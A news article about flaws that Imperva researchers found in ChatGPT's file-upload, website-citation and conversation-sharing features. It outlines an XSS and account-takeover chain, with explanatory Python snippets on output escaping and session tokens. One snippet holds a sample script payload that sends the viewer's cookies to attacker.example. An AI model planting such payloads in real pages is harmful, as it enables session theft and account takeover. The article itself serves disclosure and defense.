Israeli research reveals ChatGPT weak spots, saves millions from being hacked

Exclusive: Vulnerabilities revealed by an Israeli researcher could have affected millions of users of the world's most popular AI service, allowing attackers to gain full access to any account on the platform; OpenAI has since fixed the flaws, and the danger no longer exists

The research group of the Israeli-American cyber company Imperva revealed on Monday a series of security vulnerabilities in the popular AI chatbot ChatGPT. According to the researchers, these vulnerabilities could have allowed hackers to take over user accounts without needing login credentials. This is a severe problem that could have exposed a great deal of personal information, given the diverse tasks the chatbot handles and the fact that it saves conversation histories.
ChatGPT currently has about 180 million registered users, so the breach could have affected millions of users worldwide and given hackers full access to any account on the platform. The vulnerabilities could have been exploited through ChatGPT's file upload mechanism and its ability to cite content from those files.
Additionally, a cross-site scripting (XSS) vulnerability was found that originated in the way ChatGPT cites websites, that is, its ability to read web pages. It allowed the company's researchers to run malicious code on the AI platform by embedding it in a malicious website.
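An XSS flaw of this kind arises when a service renders fetched web content into its own pages without escaping it first. The following is a minimal, hypothetical sketch (the function names and payload are illustrative, not ChatGPT's actual code) contrasting unsafe string interpolation with proper HTML escaping:

```python
import html

def render_citation_unsafe(page_title: str) -> str:
    # Naive: the fetched title is inserted into the page verbatim,
    # so a title containing <script> tags would execute in the viewer's browser.
    return f"<blockquote>Cited from: {page_title}</blockquote>"

def render_citation_safe(page_title: str) -> str:
    # Escaping turns markup characters into inert HTML entities.
    return f"<blockquote>Cited from: {html.escape(page_title)}</blockquote>"

# A malicious site could serve a title carrying a script payload:
payload = '<script>fetch("https://attacker.example/?t=" + document.cookie)</script>'

print(render_citation_unsafe(payload))  # script tag survives intact -> XSS
print(render_citation_safe(payload))    # rendered as harmless text
```

Any content pulled from a third-party site has to be treated as untrusted input; escaping it at render time is the standard defense.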
(Image: AI can be of service or contain malicious content. Photo generated by DALL-E3)
A successful attack would have allowed a hacker to perform any action within a compromised account, including deleting, creating and updating data, and even accessing it. These vulnerabilities were reported to OpenAI and quickly fixed.
Ron Masas, the Imperva security researcher who identified the vulnerabilities, explained that these are problems found in many websites and online services. "The idea is to allow the browser to take advantage of the login token and the identification of the connected user," he said. A token is a code the browser uses to identify itself to the service it is connected to, like an identity card: it includes the login details and allows the service to confirm they are correct.
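In practice, such a token is typically a session cookie or bearer token the browser attaches to every request. A toy sketch (hypothetical names, not OpenAI's implementation) shows why whoever holds the token is treated as the logged-in user:

```python
import secrets

# Toy in-memory session store: token -> user identity.
sessions: dict[str, str] = {}

def log_in(username: str) -> str:
    # On login, the service mints a random token and remembers who owns it.
    token = secrets.token_hex(16)
    sessions[token] = username
    return token

def handle_request(token: str) -> str:
    # The service identifies the caller purely by the token it presents,
    # which is why a stolen token grants full access to the account.
    return sessions.get(token, "anonymous")

alice_token = log_in("alice")
print(handle_request(alice_token))  # legitimate browser, identified as alice
print(handle_request("forged"))     # unknown token, treated as anonymous
```

An attacker who exfiltrates the token, for example via an XSS payload, presents exactly the same credential as the real browser and is indistinguishable from the account owner.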
"My investigation began with an examination of ChatGPT's file uploading mechanism and its citation functionality from those files. By uploading a malicious file and exploiting additional weaknesses, I was able to create a conversation with ChatGPT that could be shared and allowed full control of any account that accessed it," Masas explained.
(Image: Ron Masas, security researcher at Imperva. Photo: Private)
These are not the first security issues to be discovered in ChatGPT. The chatbot was disabled after hackers broke into OpenAI's systems in May. A more recent report found that hacking groups are exploiting the service's code-writing capabilities to probe for vulnerabilities and improve the performance of their malicious code. Malicious actors have also used the service to spread pro-Palestinian propaganda online.
Breaches and weaknesses are common in new platforms, and it can take developers a long time to close them all. Still, this is a serious problem that continues to trouble the industry. At the same time, it is hard to ignore that ChatGPT's developers didn't simply run their own site's code through the chatbot to have it detect the vulnerabilities in the platform itself.